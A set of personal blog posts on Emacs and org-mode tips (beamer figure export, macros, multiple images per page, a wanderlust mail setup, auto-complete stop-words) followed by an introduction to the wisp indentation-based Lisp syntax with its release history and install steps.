Anything before the | in the SEQ_TODO is shown in red (not yet done), anything after the | is show in green (done). Things which get triggered when something is done (like storing the time of a scheduled entry) happen when the state crosses the |.
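
If you want the same states in every org file without adding the #+SEQ_TODO line each time, the global equivalent in your .emacs would be (a sketch of the simple sequence):

; global equivalent of the #+SEQ_TODO line above
(setq org-todo-keywords
      '((sequence "❢" "☯" "⧖" "|" "☺" "✔" "⌚" "✘")))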

And with that, my orgmode documents are not only very useful but also look pretty lean. Just as good as having a GUI with images, but additionally I can access them over SSH and edit the todo state with any tool - because it’s just text.

Use the source, Luke! — Emacs org-mode beamer export with images in figure

I just needed to tweak my Emacs org-mode to beamer-latex export to embed images into a figure environment (not wrapfigure!). After lots of googling and documentation reading I decided to bite the bullet and just read the source. Which proved to be much easier than I had expected.

This tutorial requires at least org-mode 8.0 (before that you had to use hacks to get figure without a caption). It is only tested for org-mode 8.0.2: The code you see when you read the source might look different in other versions.

1 Task

I just needed to tweak my org-mode to beamer-latex export to embed images I produce with a code snippet in a figure environment. Practically speaking: I had this

#+BEGIN_SRC sh :exports results :results output raw
echo '[[./image.png]]'
#+END_SRC

which produces this latex snippet

\includegraphics[width=.9\linewidth]{./image.png}

and I needed a snippet which instead produces this:

\begin{figure}[htb]
\centering
\includegraphics[width=.9\linewidth]{./image.png}
\end{figure}

2 Use the Source!

After lots of googling and documentation reading I decided to bite the bullet and just read the source. Which proved to be much easier than I had expected (warning: obscure list of commands follows. Will be explained afterwards):

C-h f org-latex-export-as-latex
C-x C-o
C-s .el C-b ENTER
C-s figure C-s C-s C-s ...

And less than a minute after starting, I saw this:

(float (let ((float (plist-get attr :float)))
     (cond ((string= float "wrap") 'wrap)
       ((string= float "multicolumn") 'multicolumn)
       ((or (string= float "figure")
            (org-element-property :caption parent))
        'figure))))

Translated: Just add this to the output of the source block:

#+attr_latex: :float figure

which makes the sh block look like this:

#+BEGIN_SRC sh :exports results :results output raw
echo '#+attr_latex: :float figure'
echo '[[./image.png]]'
#+END_SRC

And voila, the export works and the latex looks like this:

\begin{figure}[htb]
\centering
\includegraphics[width=.9\linewidth]{./image.png}
\end{figure}

Mission accomplished!

3 Commands Explained

For all those who are not fluent in emacs commands, here’s a short breakdown of my source-reading process:

C-h f org-latex-export-as-latex

Get the help (Control-h) for the function (f) org-latex-export-as-latex. I knew that org-mode calls that. If you did not know it, you could have simply used C-h k C-c C-e (get help on the export keyboard shortcut) which would have led you to the function org-export-dispatch and the source file ox.el. But since the org-mode guides tell you to use M-x org-latex-export-as-latex, the function to search for is actually pretty obvious. Alternatively just use M-x org-latex- and then type TAB 2 times. That will show you all the export functions.

C-x C-o

Switch to the other buffer.

C-s .el C-b ENTER

Focus on the source file and open it (the canonical suffix for emacs lisp files is .el).

C-s figure C-s C-s C-s ...

Search for figure. Repeat 9 times to find the correct place in the code (in emacs that’s really easy and fast to do).

Voilà, you found the snippet which tells you that you can use the float-keyword (:float) with the argument "figure".
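As an aside: if you already know the function name, Emacs can also jump straight to its definition without the detour through the help buffer. The built-in find-function command (from the find-func library) does that, provided the Emacs Lisp sources are installed:

M-x find-function RET org-latex-export-as-latex RET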

4 Conclusion

Using the source was actually faster than googling in this case - and if you practise it, you learn bits and pieces about the foundation of the program you use, which will enable you to adapt it even better to your needs in the future.

And with that, I conclude this text.

Enjoy your Emacs and Happy Hacking!

Attachments:
2013-08-28-Mi-use-the-source-beamer-figure.org (3.8 KB)

Using Macros to avoid tedious tasks (screencast)

Because I am lazy,1 and that makes me fast.

Screencast

(download (ogg theora video))

Using Macros to avoid tedious tasks

Plan

  • [X] Show the task
  • [X] Record Macro
  • [X] Use Macro

Explanation

I record a macro to find ~, then activate the mark and find a space.

C-s ~, C-SPACE, C-s SPACE

Then kill the region and type ${}

C-w ${}

That’s it.
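For reference, the same edit can also be written as a small command instead of a keyboard macro. This is an untested sketch (the name my-tilde-to-math is made up here); search-forward and kill-region mirror the C-s and C-w steps from above:

(defun my-tilde-to-math ()
  "From point, kill the text from after the next ~ through the following space, then insert ${}."
  (interactive)
  (when (search-forward "~" nil t)      ;; C-s ~
    (let ((start (point)))              ;; C-SPC: remember where the region starts
      (when (search-forward " " nil t)  ;; C-s SPACE
        (kill-region start (point))     ;; C-w
        (insert "${}")))))              ;; type ${}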

Why??

  • It is resilient: I check each change I make.
  • I avoid repeating unnerving stuff.

Thank you

recorded with recordmydesktop: recordmydesktop --delay 10 --width 800 --height 600 --on-the-fly-encoding


  1. I have lots of stuff to do, so I cannot afford not being lazy ☺ 

Attachments:
using-emacs-macros-to-reduce-tedious-work-screencast.ogv (17.81 MB)
using-emacs-macros-to-reduce-tedious-work-screencast.org (397 Bytes)

Wish: KDE with Emacs-style keyboard shortcuts

I would love to be able to use KDE with emacs-style keyboard shortcuts, because Emacs offers a huge set of already clearly defined shortcuts for many different situations. Since its users tend to do a great deal with the keyboard alone, even rather obscure tasks are available via shortcuts.

I think that this would be useful, because Emacs is a kind of non-graphical desktop environment in itself (just look at emacspeak!). For all those who use Emacs in a KDE environment, it could be a nice timesaver to be able to just use their accustomed bindings.

It also has a mostly clean structure for the bindings:

  • "C-x anything" does changes which affect things outside the content of the current buffer.
  • "C-c anything" is kept for specific actions of programs. For example "C-c C-c" in an email sends the email, while "C-c C-c" in a version tracking commit message finishes the message and starts the actual commit.
  • "C-anything but x or c" acts on the content you're currently editing.
  • "M-x" opens a 'command-selection-dialog' (just like alt-f2). You can run commands by name.
  • "M-anything but x" is a different flavor of "C-anything but x or c". For example "C-f" moves the cursor one character forward, while "M-f" moves one word forward. "C-v" moves one page forward, while "M-v" moves one page backwards.

On the backend side, this would require being able to define multistep shortcuts. Everything else is just porting the emacs shortcuts to KDE actions.
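For reference, this is how a multistep shortcut looks on the Emacs side: a prefix key opens a keymap, and the second key selects an action from it. A minimal sketch (the C-c k prefix and the chosen commands are just examples, not standard bindings):

(define-prefix-command 'my-example-prefix-map)
(global-set-key (kbd "C-c k") 'my-example-prefix-map)
(define-key my-example-prefix-map (kbd "f") #'find-file)    ;; C-c k f opens a file
(define-key my-example-prefix-map (kbd "s") #'save-buffer)  ;; C-c k s saves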

The actual porting of shortcuts would then require mapping of the Emacs commands to KDE actions.

Some examples:

  • "C-s" searches in a file. Replaces C-f.
  • "C-r" searches backwards.
  • "C-x C-s" saves a file -> close. Replaces C-w.
  • "C-x C-f" opens a file -> Open. Replaces C-o.
  • "C-x C-c" closes the program -> quit. Replaces C-q.
  • "C-x C-b" switches between buffers/files/tabs -> switch the open file. Replaces alt-right_arrow and a few other (to my knowledge) inconsistent bindings.
  • "C-x C-2" splits a window (or part of a window) vertically. "C-x C-o" switches between the parts. "C-x C-1" undoes the split and keeps the currently selected part. "C-x C-0" undoes the split and hides the currently selected part.

Write multiple images on a single page in org-mode.

How to show multiple images on one page in the latex-export of emacs org-mode. I had this problem; this is my current solution.


1 Prep

Use the package subfig:

#+latex_header: \usepackage{subfig}

And create an image:

import pylab as pl
import numpy as np
x = np.random.random(size=(2,1000))
pl.scatter(x[0,:], x[1,:], marker=".")
pl.savefig("test.png")
print "\label{fig:image}"
print "[[./test.png]]"

\label{fig:image} test.png

Image: \ref{fig:image}

2 Multiple images on one page in LaTeX

#+BEGIN_LaTeX
\begin{figure}\centering
\subfloat[A gull]{\label{fig:latex-gull} 
\includegraphics[width=0.3\textwidth]{test}
} 
\subfloat[A tiger]{\label{fig:latex-tiger} 
\includegraphics[width=0.3\textwidth]{test}
} 
\subfloat[A mouse]{\label{fig:latex-mouse} 
\includegraphics[width=0.3\textwidth]{test}
}
\caption{Multiple pictures}\label{fig:latex-animals}
\end{figure}
#+END_LaTeX

Latex-Animals \ref{fig:latex-animals}.

3 Multiple images on one page in org-mode

#+latex: \begin{figure}\centering
#+latex: \subfloat[A gull]{\label{fig:org-gull} 
#+attr_latex: :width 0.3\textwidth
[[./test.png]]
#+latex: }\subfloat[A tiger]{\label{fig:org-tiger} 
#+attr_latex: :width 0.3\textwidth
[[./test.png]]
#+latex: }\subfloat[A mouse]{\label{fig:org-mouse} 
#+attr_latex: :width 0.3\textwidth
[[./test.png]]
#+latex: }\caption{Multiple pictures}\label{fig:org-animals}
#+latex: \end{figure}

(in the exported document, test.png appears here three times, as the three subfigures defined above)

Org-Animals \ref{fig:org-animals}.

Attachments:
test.png (98.4 KB)
2014-01-14-Di-org-mode-multiple-images-per-page.pdf (281.84 KB)
2014-01-14-Di-org-mode-multiple-images-per-page.org (2.48 KB)

emacs wanderlust.el setup for reading kmail maildir

This is my wanderlust.el file to read kmail maildirs. You need to define every folder you want to read.

;; mode:-*-emacs-lisp-*-
;; wanderlust 
(setq 
  elmo-maildir-folder-path "~/.kde/share/apps/kmail/mail"
          ;; where i store my mail

  wl-stay-folder-window t                       ;; show the folder pane (left)
  wl-folder-window-width 25                     ;; toggle on/off with 'i'
  
  wl-smtp-posting-server "smtp.web.de"            ;; put the smtp server here
  wl-local-domain "draketo.de"          ;; put something here...
  wl-message-id-domain "web.de"     ;; ...

;; file continued:

  wl-from "Arne Babenhauserheide "                  ;; my From:

  ;; note: all below are dirs (Maildirs) under elmo-maildir-folder-path 
  ;; the '.'-prefix is for marking them as maildirs
  wl-fcc ".sent-mail"                       ;; sent msgs go to the "sent"-folder
  wl-fcc-force-as-read t               ;; mark sent messages as read 
  wl-default-folder ".inbox"           ;; my main inbox 
  wl-draft-folder ".drafts"            ;; store drafts in 'drafts'
  wl-trash-folder ".trash"             ;; put trash in 'trash'
  wl-spam-folder ".gruppiert/Spam"              ;; ...spam as well
  wl-queue-folder ".queue"             ;; we don't use this

  ;; check this folder periodically, and update modeline
  wl-biff-check-folder-list '(".todo") ;; check every 180 seconds
                                       ;; (default: wl-biff-check-interval)

  ;; hide many fields from message buffers
  wl-message-ignored-field-list '("^.*:")
  wl-message-visible-field-list
  '("^\\(To\\|Cc\\):"
    "^Subject:"
    "^\\(From\\|Reply-To\\):"
    "^Organization:"
    "^Message-Id:"
    "^\\(Posted\\|Date\\):"
    )
  wl-message-sort-field-list
  '("^From"
    "^Organization:"
    "^X-Attribution:"
     "^Subject"
     "^Date"
     "^To"
     "^Cc"))


; Encryption via GnuPG

(require 'mailcrypt)
 (load-library "mailcrypt") ; provides "mc-setversion"
(mc-setversion "gpg")    ; for PGP 2.6 (default); also "5.0" and "gpg"

(autoload 'mc-install-write-mode "mailcrypt" nil t)
(autoload 'mc-install-read-mode "mailcrypt" nil t)
(add-hook 'mail-mode-hook 'mc-install-write-mode)

(add-hook 'wl-summary-mode-hook 'mc-install-read-mode)
(add-hook 'wl-mail-setup-hook 'mc-install-write-mode)

;(setq mc-pgp-keydir "~/.gnupg")
;(setq mc-pgp-path "gpg")
(setq mc-encrypt-for-me t)
(setq mc-pgp-user-id "FE96C404")

(defun mc-wl-verify-signature ()
  (interactive)
  (save-window-excursion
    (wl-summary-jump-to-current-message)
    (mc-verify)))

(defun mc-wl-decrypt-message ()
  (interactive)
  (save-window-excursion
    (wl-summary-jump-to-current-message)
    (let ((inhibit-read-only t))
      (mc-decrypt))))

(eval-after-load "mailcrypt"
  '(setq mc-modes-alist
       (append
        (quote
         ((wl-draft-mode (encrypt . mc-encrypt-message)
            (sign . mc-sign-message))
          (wl-summary-mode (decrypt . mc-wl-decrypt-message)
            (verify . mc-wl-verify-signature))))
        mc-modes-alist)))


; flowed text

 ;; Reading f=f
 (autoload 'fill-flowed "flow-fill")
 (add-hook 'mime-display-text/plain-hook
          (lambda ()
            (when (string= "flowed"
                           (cdr (assoc "format"
                                       (mime-content-type-parameters
                                        (mime-entity-content-type entity)))))
              (fill-flowed))))
; writing f=f
;(mime-edit-insert-tag "text" "plain" "; format=flowed")


(provide 'private-wanderlust)

UPDATE (2012-05-07): ~/.folders

I now use a ~/.folders file to manage my non-kmail maildir subscriptions, too. It looks like this:

.sent-mail
.~/.local/share/mail/mgl_spam   "mgl spam" 
.~/.local/share/mail/to.arne_bab    "to arne_bab"
.inbox  "inbox" 
.trash  "Trash"
..gruppiert.directory/.inbox.directory/Freunde  "Freunde"
.drafts "Drafts"
..gruppiert.directory/.alt.directory/Posteingang-2011-09-18 "2011-09-18"
.outbox

The mail in ~/.local/share/mail is fetched via fetchmail and procmail, giving a really reliable mail-fetching setup which keeps working even when a database breaks or the disk runs out of free space…

keep auto-complete from competing with org-mode structure-templates

For a long time it bothered me that auto-complete made it necessary for me to abort completion before being able to use org-mode templates.

I typed <s and auto-complete showed stuff like <string, forcing me to hit C-g before I could use TAB to complete the template with org-mode.

I fixed this for me by adding all the org-mode structure templates as stop-words:

;; avoid competing with org-mode templates.
(require 'cl) ;; provides `loop`
(add-hook 'org-mode-hook
          (lambda ()
            (make-local-variable 'ac-stop-words)
            (loop for template in org-structure-template-alist do
                  (add-to-list 'ac-stop-words 
                               (concat "<" (car template))))))

Note that with this snippet you will have to reopen a file if you add an org-mode template and want it recognized as a stop-word in that file.

PS: I added this as bug-report to auto-complete, so with some luck you might not have to bother with this, if you’re willing to simply wait for the next release ☺

Free Software

„Free, Reliable, Ethical and Efficient“
„Frei, Robust, Ethisch und Innovativ”
„Libre, Inagotable, Bravo, Racional y Encantado“

Articles connected to Free Software (mostly as defined by the GNU Project). This is more technical than Politics and Free Licensing, though there is some overlap.

Also see my lists of articles about specific free software projects:

  • Emacs - THE Editor.
  • Freenet - Decentralized, Anonymous Communication.
  • Mercurial - Decentralized Version Control System.

There is also a German version of this page: Freie Software. Most articles are not translated, so the content on the German page and on the English page differs considerably.

wisp: Whitespace to Lisp

New version: draketo.de/software/wisp

» I love the syntax of Python, but crave the simplicity and power of Lisp.«

display "Hello World!" ↦ (display "Hello World!")
define : factorial n     (define (factorial n)            
    if : zero? n       ↦     (if (zero? n)                
       . 1                      1                      
       * n : factorial {n - 1}  (* n (factorial {n - 1}))))

Wisp basics

»ArneBab's alternate sexp syntax is best I've seen; pythonesque, hides parens but keeps power« — Christopher Webber in twitter, in identi.ca and in his blog: Wisp: Lisp, minus the parentheses
♡ wow ♡
»Wisp allows people to see code how Lispers perceive it. Its structure becomes apparent.« — Ricardo Wurmus in IRC, paraphrasing the wisp statement from his talk at FOSDEM 2019 about Guix for reproducible science in HPC.
☺ Yay! ☺
with (open-file "with.w" "r") as port
     format #t "~a\n" : read port
Familiar with-statement in 25 lines.


Update (2020-09-15): Wisp 1.0.3 provides a wisp binary to start a wisp repl or run wisp files, builds with Guile 3, and moved to sourcehut for libre hosting: hg.sr.ht/~arnebab/wisp.
After installation, just run wisp to enter a wisp-shell (REPL).
This release also ships wisp-mode 0.2.6 (fewer autoloads), ob-wisp 0.1 (initial support for org-babel), and additional examples. New auxiliary projects include wispserve for experiments with streaming and download-mesh via Guile, and wisp support in conf:
conf new -l wisp PROJNAME creates an autotools project with wisp, while conf new -l wisp-enter PROJNAME creates a project with natural script writing and guile doctests set up. Both also install a script to run your project with minimal start time: I see 25ms to 130ms for hello world (36ms on average). The name of the script is the name of your project.
For more info about Wisp 1.0.3, see the NEWS file.
To test wisp v1.0.3, install Guile 2.0.11 or later and bootstrap wisp:

wget https://www.draketo.de/files/wisp-1.0.3.tar_.gz;
tar xf wisp-1.0.3.tar_.gz ; cd wisp-1.0.3/;
./configure; make check;
examples/newbase60.w 123

If it prints 23 (123 in NewBase60), your wisp is fully operational.
If you have additional questions, see the Frequently asked Questions (FAQ) and chat in #guile at freenode.
That’s it - have fun with wisp syntax!

Update (2019-07-16): wisp-mode 0.2.5 now provides proper indentation support in Emacs: Tab increases indentation and cycles back to zero. Shift-tab decreases indentation via previously defined indentation levels. Return preserves the indentation level (hit tab twice to go to zero indentation).
Update (2019-06-16): In “c programming the uncommon way”, specifically c-indent, tantalum is experimenting with combining wisp and sph-sc, which compiles scheme-like s-expressions to c. The result is a program written like this:
pre-include "stdio.h"

define (main argc argv) : int int char**
  declare i int
  printf "the number of arguments is %d\n" argc
  for : (set i 0) (< i argc) (set+ i 1)
    printf "arg %d is %s\n" (+ i 1) (array-get argv i)
  return 0 ;; code-snippet under GPLv3+
To me that looks so close to C that it took me a moment to realize that it isn’t just using a parser which allows omitting some special syntax of C, but actually an implementation of a C-generator in Scheme (similar in spirit to cython, which generates C from Python), which results in code that looks like a more regular version of C without superfluous parens. Wisp really completes the round-trip from C over Scheme to something that looks like C but has all the regularity of Scheme, because all things considered, the code example is regular wisp-code. And it is awesome to see tantalum take up the tool I created and use it to experiment with ways to program that I never even imagined! ♡
TLDR: tantalum uses wisp for code that looks like C and compiles to C but has the regularity of Scheme!
Update (2019-06-02): The repository at https://www.draketo.de/proj/wisp/ is stale at the moment, because the staticsite extension I use to update it was broken by API changes and I currently don’t have the time to fix it. Therefore until I get it fixed, the canonical repository for wisp is https://bitbucket.org/ArneBab/wisp/. I’m sorry for that. I would prefer to self-host it again, but the time needed to read up on what I have to adjust blocks that right now (typically the actual fix only needs a few lines). A pull-request which fixes the staticsite extension for modern Mercurial would be much appreciated!
Update (2019-02-08): wisp v1.0 released as announced at FOSDEM. Wisp the language is complete:
display "Hello World!"
↦ (display "Hello World!")

And it achieves its goal:
“Wisp allows people to see code how Lispers perceive it. Its structure becomes apparent.” — Ricardo Wurmus at FOSDEM
Tooling, documentation, and porting of wisp are still work in progress, but before I go on, I want to thank the people from the readable lisp project. Without our initial shared path, and without their encouragement, wisp would not be here today. Thank you! You’re awesome!
With this release it is time to put wisp to use. To start your own project, see the tutorial Starting a wisp project and the wisp tutorial. For more info, see the NEWS file. To test wisp v1.0, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-1.0.tar.gz;
tar xf wisp-1.0.tar.gz ; cd wisp-1.0/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
If you have additional questions, see the Frequently asked Questions (FAQ) and chat in #guile at freenode.
That’s it - have fun with wisp syntax!
Update (2019-01-27): wisp v0.9.9.1 released which includes the emacs support files missed in v0.9.9, but excludes unnecessary files which increased the release size from 500k to 9 MiB (it's now back at about 500k). To start your own wisp-project, see the tutorial Starting a wisp project and the wisp tutorial. For more info, see the NEWS file. To test wisp v0.9.9.1, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.9.1.tar.gz;
tar xf wisp-0.9.9.1.tar.gz ; cd wisp-0.9.9.1/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2019-01-22): wisp v0.9.9 released with support for literal arrays in Guile (needed for doctests), example start times below 100ms, ob-wisp.el for emacs org-mode babel and work on examples: network, securepassword, and downloadmesh. To start your own wisp-project, see the tutorial Starting a wisp project and the wisp tutorial. For more info, see the NEWS file. To test wisp v0.9.9, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.9.tar.gz;
tar xf wisp-0.9.9.tar.gz ; cd wisp-0.9.9/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2018-06-26): There is now a wisp tutorial for beginning programmers: “In this tutorial you will learn to write programs with wisp. It requires no prior knowledge of programming.” See Learn to program with Wisp, published in With Guise and Guile.
Update (2017-11-10): wisp v0.9.8 released with installation fixes (thanks to benq!). To start your own wisp-project, see the tutorial Starting a wisp project. For more info, see the NEWS file. To test wisp v0.9.8, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.8.tar.gz;
tar xf wisp-0.9.8.tar.gz ; cd wisp-0.9.8/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2017-10-17): wisp v0.9.7 released with bugfixes. To start your own wisp-project, see the tutorial Starting a wisp project. For more info, see the NEWS file. To test wisp v0.9.7, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.7.tar.gz;
tar xf wisp-0.9.7.tar.gz ; cd wisp-0.9.7/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2017-10-08): wisp v0.9.6 released with compatibility for tests on OSX and old autotools, installation to guile/site/(guile version)/language/wisp for cleaner installation, debugging and warning when using not yet defined lower indentation levels, and with wisp-scheme.scm moved to language/wisp.scm. This allows creating a wisp project by simply copying language/. A short tutorial for creating a wisp project is available at Starting a wisp project as part of With Guise and Guile. For more info, see the NEWS file. To test wisp v0.9.6, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.6.tar.gz;
tar xf wisp-0.9.6.tar.gz ; cd wisp-0.9.6/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2017-08-19): Thanks to tantalum, wisp is now available as package for Arch Linux: from the Arch User Repository (AUR) as guile-wisp-hg! Instructions for installing the package are provided on the AUR page in the Arch Linux wiki. Thank you, tantalum!
Update (2017-08-20): wisp v0.9.2 released with many additional examples including the proof-of-concept for a minimum ceremony dialog-based game duel.w and the datatype benchmarks in benchmark.w. For more info, see the NEWS file. To test it, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.2.tar.gz;
tar xf wisp-0.9.2.tar.gz ; cd wisp-0.9.2/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2017-03-18): I removed the link to Gozala’s wisp, because it was put in maintenance mode. Quite the opposite of Guile which is taking up speed and just released Guile version 2.2.0, fully compatible with wisp (though wisp helped to find and fix one compiler bug, which is something I’m really happy about ☺).
Update (2017-02-05): Christopher Allan Webber presented my talk Natural script writing with Guile in the Guile devroom at FOSDEM. The talk was awesome — and recorded! Enjoy Natural script writing with Guile by "pretend Arne" ☺

Also available: the presentation (pdf, 16 slides) and its source (org).
Have fun with wisp syntax!
Update (2016-07-12): wisp v0.9.1 released with a fix for multiline strings and many additional examples. For more info, see the NEWS file. To test it, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.1.tar.gz;
tar xf wisp-0.9.1.tar.gz ; cd wisp-0.9.1/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2016-01-30): I presented Wisp in the Guile devroom at FOSDEM. The reception was unexpectedly positive — given some of the backlash the readable project got I expected an exceptionally sceptical audience, but people rather asked about ways to put Wisp to good use, for example in templates, whether it works in the REPL (yes, it does) and whether it could help people start into Scheme. The atmosphere in the Guile devroom was very constructive and friendly during all talks, and I’m happy I could meet the Hackers there in person. I’m definitely taking good memories with me. Sadly the video did not make it, but the schedule-page includes the presentation (pdf, 10 slides) and its source (org).
Have fun with wisp syntax!
Update (2016-01-04): Wisp is available in GNU Guix! Thanks to the package from Christopher Webber you can try Wisp easily on top of any distribution:
guix package -i guile guile-wisp
guile --language=wisp
This already gives you Wisp at the REPL (take care to follow all instructions for installing Guix on top of another distro, especially the locales).
Have fun with wisp syntax!
Update (2015-10-01): wisp v0.9.0 released which no longer depends on Python for bootstrapping releases (but ./configure still asks for it — a fix for another day). And thanks to Christopher Webber there is now a patch to install wisp within GNU Guix. For more info, see the NEWS file. To test it, install Guile 2.0.11 or later and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.9.0.tar.gz;
tar xf wisp-0.9.0.tar.gz ; cd wisp-0.9.0/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2015-09-12): wisp v0.8.6 released with fixed macros in interpreted code, chunking by top-level forms, : . parsed as nothing, ending chunks with a trailing period, updated example evolve and added examples newbase60, cli, cholesky decomposition, closure and hoist in loop. For more info, see the NEWS file. To test it, install Guile 2.0.x or 2.2.x and Python 3 and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.6.tar.gz;
tar xf wisp-0.8.6.tar.gz ; cd wisp-0.8.6/;
./configure; make check;
examples/newbase60.w 123
If it prints 23 (123 in NewBase60), your wisp is fully operational.
That’s it - have fun with wisp syntax! And a happy time together for the ones who merge their paths today ☺
Update (2015-04-10): wisp v0.8.3 released with line information in backtraces. For more info, see the NEWS file. To test it, install Guile 2.0.x or 2.2.x and Python 3 and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.3.tar.gz;
tar xf wisp-0.8.3.tar.gz ; cd wisp-0.8.3/;
./configure; make check;
guile -L . --language=wisp tests/factorial.w; echo
If it prints 120120 (two times 120, the factorial of 5), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2015-03-18): wisp v0.8.2 released with reader bugfixes, new examples and an updated draft for SRFI 119 (wisp). For more info, see the NEWS file. To test it, install Guile 2.0.x or 2.2.x and Python 3 and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.2.tar.gz;
tar xf wisp-0.8.2.tar.gz ; cd wisp-0.8.2/;
./configure; make check;
guile -L . --language=wisp tests/factorial.w; echo
If it prints 120120 (two times 120, the factorial of 5), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2015-02-03): The wisp SRFI just got into draft state: SRFI-119 — on its way to an official Scheme Request For Implementation!
Update (2014-11-19): wisp v0.8.1 released with reader bugfixes. To test it, install Guile 2.0.x and Python 3 and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.1.tar.gz;
tar xf wisp-0.8.1.tar.gz ; cd wisp-0.8.1/;
./configure; make check;
guile -L . --language=wisp tests/factorial.w; echo
If it prints 120120 (two times 120, the factorial of 5), your wisp is fully operational.
That’s it - have fun with wisp syntax!
Update (2014-11-06): wisp v0.8.0 released! The new parser now passes the testsuite and wisp files can be executed directly. For more details, see the NEWS file. To test it, install Guile 2.0.x and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.8.0.tar.gz;
tar xf wisp-0.8.0.tar.gz ; cd wisp-0.8.0/;
./configure; make check;
guile -L . --language=wisp tests/factorial.w;
echo
If it prints 120120 (two times 120, the factorial of 5), your wisp is fully operational.
That’s it - have fun with wisp syntax!
On a personal note: It’s mindboggling that I could get this far! This is actually a fully bootstrapped indentation sensitive programming language with all the power of Scheme underneath, and it’s a one-person when-my-wife-and-children-sleep sideproject. The extensibility of Guile is awesome!
Update (2014-10-17): wisp v0.6.6 has a new implementation of the parser which now uses the scheme read function. `wisp-scheme.w` parses directly to a scheme syntax-tree instead of a scheme file to be more suitable to an SRFI. For more details, see the NEWS file. To test it, install Guile 2.0.x and bootstrap wisp:
wget https://bitbucket.org/ArneBab/wisp/downloads/wisp-0.6.6.tar.gz;
tar xf wisp-0.6.6.tar.gz; cd wisp-0.6.6;
./configure; make;
guile -L . --language=wisp
That’s it - have fun with wisp syntax at the REPL!
Caveat: It does not support the ' prefix yet (syntax point 4).
Update (2014-01-04): Resolved the name-clash together with Steve Purcell and Kris Jenkins: the javascript wisp-mode was renamed to wispjs-mode and wisp.el is called wisp-mode 0.1.5 again. It provides syntax highlighting for Emacs and minimal indentation support via tab. You can install it with `M-x package-install wisp-mode`
Update (2014-01-03): wisp-mode.el was renamed to wisp 0.1.4 to avoid a name clash with wisp-mode for the javascript-based wisp.
Update (2013-09-13): Wisp now has a REPL! Thanks go to GNU Guile and especially Mark Weaver, who guided me through the process (along with nalaginrut who answered my first clueless questions…).
To test the REPL, get the current code snapshot, unpack it, run ./bootstrap.sh, start guile with $ guile -L . (requires guile 2.x) and enter ,language wisp.
Example usage:
display "Hello World!\n"
then hit enter thrice.
Voilà, you have wisp at the REPL!
Caveat: the wisp-parser is still experimental and contains known bugs. Use it for testing, but please do not rely on it for important stuff, yet.
Update (2013-09-10): wisp-guile.w can now parse itself! Bootstrapping: The magical feeling of seeing a language (dialect) grow up to live by itself: python3 wisp.py wisp-guile.w > 1 && guile 1 wisp-guile.w > 2 && guile 2 wisp-guile.w > 3 && diff 2 3. Starting today, wisp is implemented in wisp.
Update (2013-08-08): Wisp 0.3.1 released (Changelog).


2 What is wisp?

Wisp is a simple preprocessor which turns indentation sensitive syntax into Lisp syntax.

The basic goal is to create the simplest possible indentation based syntax which is able to express all possibilities of Lisp.

Basically it works by inferring the parentheses of lisp by reading the indentation of lines.

It is related to SRFI-49 and the readable Lisp S-expressions Project (and actually inspired by the latter), but it tries to Keep it Simple and Stupid: wisp is a simple preprocessor which can be called by any lisp implementation to add support for indentation sensitive syntax. To repeat the initial quote:

I love the syntax of Python, but crave the simplicity and power of Lisp.

With wisp I hope to make it possible to create lisp code which is easily readable for non-programmers (and me!) and at the same time keeps the simplicity and power of Lisp.

Its main technical improvement over SRFI-49 and Project Readable is using lines prefixed by a dot (". ") to mark the continuation of the parameters of a function after intermediate function calls.

The dot-syntax means, instead of marking every function call, it marks every line which does not begin with a function call - which is the much less common case in lisp-code.

See the Updates for information how to get the current version of wisp.

Frequently asked Questions

Can this represent any Scheme code?

Yes. Wisp enables you to write arbitrary code structures using indentation. When you write code in wisp and run it with Guile, it is full Scheme code with all its capabilities.

How do Macros work with wisp?

Just like they work in Scheme code that has parentheses: Write the same structure as with Scheme but use indentation for structure instead of parentheses where that is more readable to you or your future readers. See for example the macro-writing-macro Enter in Enter three witches.

3 Wisp syntax rules

  1. A line without indentation is a function call, just as if it would start with a bracket.
    display "Hello World!"      ↦      (display "Hello World!")
